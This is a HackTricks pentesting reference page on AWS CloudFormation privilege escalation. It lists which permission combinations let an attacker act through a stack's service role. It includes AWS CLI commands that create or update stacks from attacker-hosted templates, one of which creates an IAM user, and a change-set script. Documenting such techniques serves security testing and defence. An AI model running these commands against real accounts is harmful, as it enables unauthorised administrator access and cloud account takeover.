README.md

AWS - Cloudformation Privesc

Support HackTricks and get benefits!

• If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

cloudformation

For more information about cloudformation check:

{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} aws-cloudformation-and-codestar-enum.md {% endcontent-ref %}

iam:PassRole, cloudformation:CreateStack

An attacker with the iam:PassRole and cloudformation:CreateStack permissions would be able to escalate privileges by creating a CloudFormation template that will perform actions and create resources using the permissions of the role that was passed when creating a CloudFormation stack.

aws cloudformation create-stack --stack-name my_stack \
    --template-url http://my-website.com/my-malicious-template.template \
    --role-arn arn_of_cloudformation_service_role

Where the template located at the attacker’s website includes directions to perform malicious actions, such as creating an administrator user and then using those credentials to escalate their own access.

In the following page you have an exploitation example with the additional permission cloudformation:DescribeStacks:

{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {% endcontent-ref %}

Potential Impact: Privesc to the cloudformation service role specified.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

In this case you can abuse an existing cloudformation stack to update it and escalate privileges as in the previous scenario:

aws cloudformation update-stack \
    --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1 

The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.

Potential Impact: Privesc to the cloudformation service role specified.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

If you have this permission but no iam:PassRole you can still update the stacks used and abuse the IAM Roles they have already attached. Check the previous section for exploit example (just don't indicate any role in the update).

The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.

Potential Impact: Privesc to the cloudformation service role already attached.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

An attacker with permissions to pass a role and create & execute a ChangeSet can create/update a new cloudformation stack abuse the cloudformation service roles just like with the CreateStack or UpdateStack.

The following exploit is a variation of the CreateStack one using the ChangeSet permissions to create a stack.

aws cloudformation create-change-set \
    --stack-name privesc \
    --change-set-name privesc \
    --change-set-type CREATE \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
    --change-set-name privesc \
    --stack-name privesc \
    --region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
    --stack-name privesc \
    --region eu-west-1

The cloudformation:SetStackPolicy permission can be used to give yourself ChangeSet permissions over a stack and perform the attack.

Potential Impact: Privesc to cloudformation service roles.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

This is like the previous method without passing IAM roles, so you can just abuse already attached ones, just modify the parameter:

--change-set-type UPDATE

Potential Impact: Privesc to the cloudformation service role already attached.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.

Potential Impact: Privesc to cloudformation service roles.

cloudformation:UpdateStackSet

An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.

Potential Impact: Privesc to the attached cloudformation roles.

Support HackTricks and get benefits!

• If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.